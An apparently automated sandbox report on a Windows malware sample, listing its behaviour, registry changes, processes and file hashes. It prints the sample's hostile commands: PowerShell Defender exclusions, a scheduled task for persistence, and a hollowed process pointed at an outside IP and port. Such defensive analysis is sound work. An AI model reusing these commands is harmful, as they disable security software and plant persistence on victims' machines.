Malware Analysis Report

2025-03-14 23:15

Sample ID 240407-wzdjwsah2s
Target SSCosmetics (2).exe
SHA256 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474
Tags persistence
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474

Threat Level: Known bad

The file SSCosmetics (2).exe was found to be: Known bad.

Malicious Activity Summary

persistence

Contains code to disable Windows Defender

Checks computer location settings

Executes dropped EXE

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-04-07 18:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-04-07 18:21
Reported 2024-04-07 18:38
Platform win10v2004-20240226-en
Max time kernel 433s
Max time network 458s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\System.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\System.exe" C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4404 set thread context of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4404 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\schtasks.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3828 wrote to memory of 960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 960 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3828 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe

"C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSCosmetics (2).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\System.exe"

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.19 21574 <123456789> DF9D76493D2052CA298B

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

Network

Files


memory/4408-60-0x0000021CDAF90000-0x0000021CDAFA0000-memory.dmp

memory/4408-59-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4408-63-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-68-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-69-0x000000001B420000-0x000000001B430000-memory.dmp

memory/4404-70-0x0000000002B50000-0x0000000002B5C000-memory.dmp

C:\Users\Admin\System.exe

MD5 f278e2fb4010c8403c00cf988354a0fd
SHA1 3c1c63f2f6678cc55deda531413674c9f4b090cf
SHA256 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474
SHA512 85257af5832cb33de94d80544720ae91f2060b63513ddfac9698637531a5c1049dd37c22416fd0d624e6430be2f0c03d436ef4009cb2cab91c087169723da0b9

memory/2520-73-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2520-75-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/5012-79-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/5012-80-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4788-82-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4788-83-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2692-85-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2692-86-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-87-0x000000001B480000-0x000000001B496000-memory.dmp

memory/3828-88-0x0000000000400000-0x0000000000410000-memory.dmp

memory/3828-89-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/3828-91-0x00000000053A0000-0x0000000005432000-memory.dmp

memory/3828-90-0x0000000005300000-0x000000000539C000-memory.dmp

memory/3828-92-0x00000000059F0000-0x0000000005F94000-memory.dmp

memory/3828-93-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/960-95-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/960-96-0x0000000004A30000-0x0000000004A40000-memory.dmp

memory/960-94-0x0000000004880000-0x00000000048B6000-memory.dmp

memory/960-97-0x0000000005070000-0x0000000005698000-memory.dmp

memory/960-98-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

memory/960-99-0x0000000005710000-0x0000000005776000-memory.dmp

memory/960-109-0x0000000005860000-0x0000000005BB4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

memory/960-111-0x0000000005E40000-0x0000000005E5E000-memory.dmp

memory/960-112-0x0000000005E70000-0x0000000005EBC000-memory.dmp

memory/960-115-0x0000000074FF0000-0x00000000757A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\CrashpadMetrics-active.pma

MD5 f9abba11224c1ad45bcdaa95e882842b
SHA1 1c8bfbcb53d611f72ccc9b80c04eb4a1e45a2400
SHA256 bb7428477de5d502b5414b3123ae7bcd5aeb61d37da8492318a9a6b45242884b
SHA512 90a9a486a505a44e012d49104f3d87954f3c729a800939cc9b127f283eafd841db8c019ba30b96ab2ebed0ce4226af2147417b41242de2dc2d600af119345926

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 e0811105475d528ab174dfdb69f935f3
SHA1 dd9689f0f70a07b4e6fb29607e42d2d5faf1f516
SHA256 c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c
SHA512 8374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State

MD5 8cd20f030c0e52c78f3b2d2bab082f29
SHA1 e924a0cf42468e929d7f50f43cb3d945b121c748
SHA256 298c4855b050a936057d26220ccae2e2ea0a99e352e7d61aa98b1232d954f90b
SHA512 cccbf4d26ae615c26bf22dc5b854b6e3d20669ece2f3ae09df32566c0b1de95f0cfc4a9da1d49cd2fdcf16e6f1905efcaa902188e3de8c8d90e1881738f4358f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Secure Preferences

MD5 c57eb69e85f77828ed87a40eae0f7add
SHA1 4124c4874e5f5383eca737dd26309cb81841352e
SHA256 c5ad6acae43eeb909035ffd0a9a61beb3d3fabbe6ef68eee89d389f5bb829d49
SHA512 3398ba1997fe673172b3241b916457adeb0372d1213b6b6fc618492ca725b1135251bb353d00cd101cc381bac5908229a2afdc8d0b1adcd076f1b6cb22e913ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Login Data

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Web Data

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sessions\Tabs_13353438338878948

MD5 7fcd0f5a1738a220266985ce13fe2239
SHA1 925674da29c597c38e117d947b2e2d5b1617fd2f
SHA256 9cfdfa688fb53570e065b6c5a8429c69b0e2c410d52cc686edeaf90676f7e04b
SHA512 7ebb1dd239920b630460da580c241ab2ecf08357025da2a40a89ed54d29675b0e99e88707c89d0a0d8af885204f90ff02caa7b42aac12b91adb6931275847240

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 47b2c6613360b818825d076d14c051f7
SHA1 7df7304568313a06540f490bf3305cb89bc03e5c
SHA256 47a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac
SHA512 08d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac

\??\pipe\LOCAL\crashpad_1932_ULJUGVYXBNEYDNLX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Favicons

MD5 71c47b8f44867d805fed290fb0a18f74
SHA1 a019b3329dd49f91ea94267f19de580c40c6ef67
SHA256 13daa8fe29d46fda8acd97cacd7baecc700b2a8763538709f8282941b629865c
SHA512 f35b779a06ef83496eb5adcd1ffeb20c144cc78ced2d923c5f87f9b9220b23c31a712b7518f691b58f65422a28b48ad569a43ee23936fa6445a9d8251a9658c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Visited Links

MD5 9109e330e97a971971eabc51e139e2a5
SHA1 1784be19cb2001025503165d0ca336eb3ed1d21a
SHA256 ec4fd5c50d2dab041a5e89bc4194f4adb3805cdcef8f3b6deb3e97e693b14957
SHA512 07af0a7d45ae1d0b828a29e4624f559ae65843e7c02a4ae4a83b20c9ec6783cf5ab2e51f15808dcc0da3e1ad60b0699e1b410f0a55b6ddaf0d8e2fa05e8fb5ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG

MD5 b2f6ddf5a9c8144d3eaa5718eeac56fe
SHA1 374b570d8e9ccab570788712a5d09ca6145b8616
SHA256 a285c90649277e792af2b94fd75687e9d02bee3a0cb65ca9407b20c2e8a68f79
SHA512 a12a0f8a8b0053f2f5c4f31972535b638ccfb029bbce910921a632dfcef3ee73d2aa7bb6f444ebe3977c8cc27230a26f0c4840223f12f48a1803dbb29d838b28

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG.old

MD5 7944ac4f945d91bf5d61e69475b18e4c
SHA1 81da808a01aaeb8144895b6ee9aac4359a27bc33
SHA256 e85b177c16c1ffee3747d60ff85ee1e57e1946f02796aa24e22944e2433e643b
SHA512 0af1141379fa833cc9dd58d6bf7f7f7664380688b0ff471a45ae020a92b41d4db270c0d847731a7fa872d03f23195aa5479c65f0b6e151a57dda537ac62c76b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8744fb59ea71b0a9603412deb911617a
SHA1 871f6a6a2ac14e5ce8cf9488495d052aca157e30
SHA256 2e971f0e8e5fc83611c30d3e1fd28a7a3b92cc87372670f3233609f1236ee293
SHA512 6d033ad15270bb08322d6c7efc594aeb1caf580290acce98f98b13637255ce5cfd945dde5aea4abdcf62d1d035cdf14947bcd02ceb71a35afc9dd381b79bfdf5

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG

MD5 a9a64bc193520c3c58f8f18654ae0570
SHA1 3bc0a66068838b3162752eeed9dc88d64dd72cc6
SHA256 828d60475300c86f91cf31d815ac64109d6d41eea1968f842cde3f0918e1ceb5
